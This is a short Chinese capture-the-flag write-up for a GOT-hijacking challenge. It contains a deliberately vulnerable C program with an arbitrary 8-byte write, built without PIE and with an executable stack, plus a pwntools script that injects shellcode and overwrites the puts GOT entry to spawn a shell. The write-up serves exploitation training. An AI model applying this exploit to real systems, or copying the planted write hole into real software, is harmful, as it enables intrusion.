gothijack(GOT劫持)

1.题目

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char name[64];

int main()
{
  int unsigned long long addr;
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  printf("What's you name?\n");
  read(0, name, 0x40);
  printf("Where do you want to write?\n");
  scanf("%llu", &addr);
  printf("Data: ");
  read(0, (char *)addr, 8);
  puts("Done!");
  printf("Thank you %s!\n", name);
  return 0;
}

Makefile:

gothijack: gothijack.c
  gcc gothijack.c -no-pie -z execstack -o gothijack

2.思路

分析题目源码发现read(0, (char *)addr, 8)可以让我们在addr这个地址处写8 Bytes，那么我们可以先在name变量中写入shellcode，然后把addr写成got表中指向puts函数的地址，然后通过read(0, (char *)addr, 8)把puts函数的地址改成name变量的地址，即可获得shell

用objdump查看got表中指向puts函数的地址和name变量的地址：

3.解题脚本

from pwn import *

# r = remote("*.*.*.*",****)
r = process('./gothijack')
context.arch = 'amd64'

sc = asm(shellcraft.sh())
r.recvuntil('?\n')
r.send(sc)

r.recvuntil('?\n')
r.sendline(str(0x601018))

r.recvuntil("Data: ")
r.send(p64(0x601080))

r.interactive()